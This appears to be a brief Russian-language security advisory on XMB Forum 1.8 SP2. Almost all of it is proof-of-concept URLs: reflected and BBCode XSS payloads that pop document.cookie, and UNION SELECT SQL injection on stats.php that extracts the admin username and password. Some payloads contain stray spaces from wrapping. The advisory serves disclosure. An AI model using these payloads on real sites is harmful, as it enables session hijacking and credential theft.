Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518)
Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение.
Пример:
http://[target]/xmb18sp2/forumdisplay.php? fid=1&foobar=<%73cript>
http://[target]/xmb18sp2/member.php?action =viewpro&member=x<%73cript>;al ert(document.cookie);</%73cript>
http://[target]/xmb18sp2/u2uadmin.php?uid=x"> <%73cript>alert(document.cookie);</%73cript>
http://[target]/xmb18sp2/editprofile.php? user=x"> <%73cript>alert(document.cookie);</%73cript>
http://[target]/xmb18sp2/viewthread.php?tid=1&ppp= x<%73cript>alert(document.cookie);</%73cript>
http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://[target]/xmb18sp2/misc.php?action=list& order=postnum&desc=x<%73cript>alert(document.
cookie);</%73cript>
http://[target]/xmb18sp2/forumdisplay.php? fid=1&tpp=x<%73cript>alert(document.
cookie);</%73cript>
http://[target]/xmb18sp2/forumdisplay.php ?fid=1&ascdesc=x<%73cript>ale rt(document.cookie);</%73cript>
text1 [align=center onmouseover= alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document. cookie);//gif[/img] text2
http://[target]/xmb18sp2/stats.php?action= view&addon=WHERE t.tid<0UNION ALLSELECT NULL,NULL,username FROM xmb_members WHERE
uid=1LIMIT 1/*
http://[target]/xmb18sp2/stats.php?action=view &addon=WHERE t.tid<0UNION ALL SELECT
NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*